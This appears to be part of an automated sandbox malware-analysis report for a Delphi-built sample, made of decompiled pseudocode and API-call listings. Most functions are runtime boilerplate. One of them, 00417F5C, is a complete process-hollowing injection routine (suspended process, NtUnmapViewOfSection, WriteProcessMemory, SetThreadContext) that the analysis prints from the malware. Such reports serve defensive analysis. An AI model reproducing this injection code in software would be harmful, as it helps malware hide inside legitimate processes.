      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
